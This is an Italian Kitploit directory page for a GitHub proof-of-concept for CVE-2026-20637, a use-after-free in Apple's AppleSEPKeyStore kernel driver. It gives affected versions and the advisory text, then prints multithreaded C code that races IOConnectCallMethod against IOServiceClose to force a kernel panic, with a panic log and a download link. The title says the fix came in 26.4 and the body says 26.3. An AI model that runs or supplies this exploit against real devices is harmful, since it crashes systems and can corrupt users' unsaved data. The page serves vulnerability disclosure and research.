Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20637-AppleSEPKeyStore-UAF — CVE-2026-20637: AppleSEPKeyStore Use-After-Free — vulnerabilità del kernel iOS/macOS (corretta nella 26.4) | Kitploit
Strumenti/GitHubGitHub/0xjohnnydev/cve-2026-20637-applesepkeystore-uaf
Sicurezza iOSAnalisi delle VulnerabilitàExploitSicurezza MobileBinary Exploitation
GitHub0xjohnnydev/cve-2026-20637-applesepkeystore-uaf

CVE-2026-20637-AppleSEPKeyStore-UAF

CVE-2026-20637: AppleSEPKeyStore Use-After-Free — vulnerabilità del kernel iOS/macOS (corretta nella 26.4)

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web
54721 mese faRevisionato da Kitploit

CVE-2026-20637: AppleSEPKeyStore Use-After-Free

CVE-2026-20637 | Autore: Johnny Franks (@zeroxjf)

Componente: AppleKeyStore

Impatto: Un'app potrebbe essere in grado di causare la terminazione imprevista del sistema

Descrizione: Un problema di use-after-free è stato risolto con una migliore gestione della memoria.

— Contenuto di sicurezza Apple, iOS 26.3 e iPadOS 26.3

Versioni interessate

iOS26.1 - 26.2 (testato)
macOS26.1 - 26.2 (testato)
Componentecom.apple.driver.AppleSEPKeyStore
CorrettoiOS 26.3 / iPadOS 26.3

Nota: Apple potrebbe aver corretto gradualmente questo problema tra 26.2.1 e 26.3, quindi potrebbe non funzionare sulle versioni intermedie.

Avvertenza

Questa PoC causa immediatamente un kernel panic sui dispositivi interessati. Salvare il lavoro prima di eseguirla; i panic forzati ripetuti possono corrompere i dati non salvati.

Vulnerabilità

Use-after-free in IOCommandGate innescato tramite una race condition open/close di AppleKeyStore. Otto thread chiamanti martellano IOConnectCallMethod sui selettori 0-15 mentre quattro thread di chiusura gareggiano su IOServiceClose, creando una finestra in cui la command gate viene acceduta dopo la liberazione.

Prova di concetto

root@kitploit:~
#define AKS_SERVICE_NAME "AppleKeyStore"
#define NUM_CALLERS 8
#define NUM_CLOSERS 4
#define NUM_ITERATIONS 100000

static _Atomic(io_connect_t) g_conn = IO_OBJECT_NULL;

// 8 caller threads: hammer IOConnectCallMethod (high priority)
while (!done) {
    io_connect_t conn = atomic_load(&g_conn);
    if (conn == IO_OBJECT_NULL) continue;
    for (uint32_t sel = 0; sel < 16; sel++) {
        IOConnectCallMethod(conn, sel, scalars, 6, NULL, 0, NULL, NULL, NULL, NULL);
    }
}

// 4 closer threads: race IOServiceClose (high priority)
while (!done) {
    io_connect_t conn = atomic_load(&g_conn);
    if (conn == IO_OBJECT_NULL) continue;
    IOServiceClose(conn);
    atomic_store(&g_conn, IO_OBJECT_NULL);
}

// Main thread: 100k connections, no delay
for (int i = 0; i < NUM_ITERATIONS; i++) {
    uint32_t type = (i % 4 == 0) ? 0x2022 : (i % 4 == 1) ? 0xbeef : (i % 4 == 2) ? 0x1337 : 0x4141;
    IOServiceOpen(svc, mach_task_self(), type, &conn);
    atomic_store(&g_conn, conn);
    // no delay: keep the close/call race window hot
}

Log del panic

root@kitploit:~
panic(cpu 4 caller 0xfffffff015b84ae0): [iokit.IOCommandGate]: element modified after free
  (off:72, val:0xfffffffffffffe00, sz:80, ptr:0xffffffe69b7d0db0)
   72: 0xfffffffffffffe00

Kernel version: Darwin Kernel Version 25.1.0: Thu Oct 23 11:09:22 PDT 2025;
  root:xnu-12377.42.6~55/RELEASE_ARM64_T8030

Panicked task 0xffffffe5b4f1e820: pid 956: Test

Kernel Extensions in backtrace:
   com.apple.driver.AppleSEPKeyStore(2.0)[AD3CDADB-06B6-32F5-9E47-9889901353CA]
      @0xfffffff016a47020->0xfffffff016a84f9f
Scarica lo strumento